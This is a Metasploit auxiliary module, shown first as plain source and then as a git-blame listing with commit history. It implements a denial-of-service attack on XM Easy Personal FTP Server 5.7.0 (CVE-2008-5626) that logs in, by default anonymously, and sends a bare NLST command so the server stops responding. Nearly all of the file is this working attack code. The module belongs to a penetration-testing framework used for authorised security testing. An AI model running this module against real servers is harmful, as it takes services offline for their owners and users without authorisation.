metasploit-framework/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Auxiliary

  include Msf::Exploit::Remote::Ftp
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'XM Easy Personal FTP Server 5.7.0 NLST DoS',
      'Description'    => %q{
        You need a valid login to DoS this FTP server, but
        even anonymous can do it as long as it has permission
        to call NLST.
      },
      'Author'         => 'kris katterjohn',
      'License'        => MSF_LICENSE,
      'References'     => [
        [ 'CVE', '2008-5626'],
        [ 'OSVDB', '50837'],
        [ 'EDB', '8294' ]
      ],
      'DisclosureDate' => 'Mar 27 2009')
    )

    # They're required
    register_options([
      OptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ]),
      OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'anonymous' ])
    ])
  end

  def run
    return unless connect_login

    raw_send("NLST\r\n")

    disconnect

    print_status("OK, server may still be technically listening, but it won't respond")
  end
end
add dos aux module for XM Easy Personal Ftp Server 5.7.0 git-svn-id: file:///home/svn/framework3/trunk@6463 4d416f70-5f16-0410-b530-b9f4589650da 2009-04-07 18:26:19 +00:00			`##`
Fix up comment splats with the correct URI See the complaint on #4039. This doesn't fix that particular issue (it's somewhat unrelated), but does solve around a file parsing problem reported by @void-in 2014-10-17 16:47:33 +00:00			`# This module requires Metasploit: http://metasploit.com/download`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 18:50:46 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
add dos aux module for XM Easy Personal Ftp Server 5.7.0 git-svn-id: file:///home/svn/framework3/trunk@6463 4d416f70-5f16-0410-b530-b9f4589650da 2009-04-07 18:26:19 +00:00			`##`

			`require 'msf/core'`

use MetasploitModule as a class name 2016-03-08 13:02:44 +00:00			`class MetasploitModule < Msf::Auxiliary`
add dos aux module for XM Easy Personal Ftp Server 5.7.0 git-svn-id: file:///home/svn/framework3/trunk@6463 4d416f70-5f16-0410-b530-b9f4589650da 2009-04-07 18:26:19 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`include Msf::Exploit::Remote::Ftp`
			`include Msf::Auxiliary::Dos`

			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'XM Easy Personal FTP Server 5.7.0 NLST DoS',`
			`'Description' => %q{`
			`You need a valid login to DoS this FTP server, but`
			`even anonymous can do it as long as it has permission`
			`to call NLST.`
			`},`
			`'Author' => 'kris katterjohn',`
			`'License' => MSF_LICENSE,`
			`'References' => [`
			`[ 'CVE', '2008-5626'],`
Revert "Land #6812, remove broken OSVDB references" This reverts commit 2b016e02165b7abf85c6847fcae2b6131f8a504d, reversing changes made to 7b1d9596c7c95097ef750407ff61f010714434a1. 2016-07-15 17:00:31 +00:00			`[ 'OSVDB', '50837'],`
Retab modules 2013-08-30 21:28:54 +00:00			`[ 'EDB', '8294' ]`
			`],`
			`'DisclosureDate' => 'Mar 27 2009')`
			`)`

			`# They're required`
			`register_options([`
			`OptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ]),`
			`OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'anonymous' ])`
			`])`
			`end`

			`def run`
			`return unless connect_login`

			`raw_send("NLST\r\n")`

			`disconnect`

			`print_status("OK, server may still be technically listening, but it won't respond")`
			`end`
add dos aux module for XM Easy Personal Ftp Server 5.7.0 git-svn-id: file:///home/svn/framework3/trunk@6463 4d416f70-5f16-0410-b530-b9f4589650da 2009-04-07 18:26:19 +00:00			`end`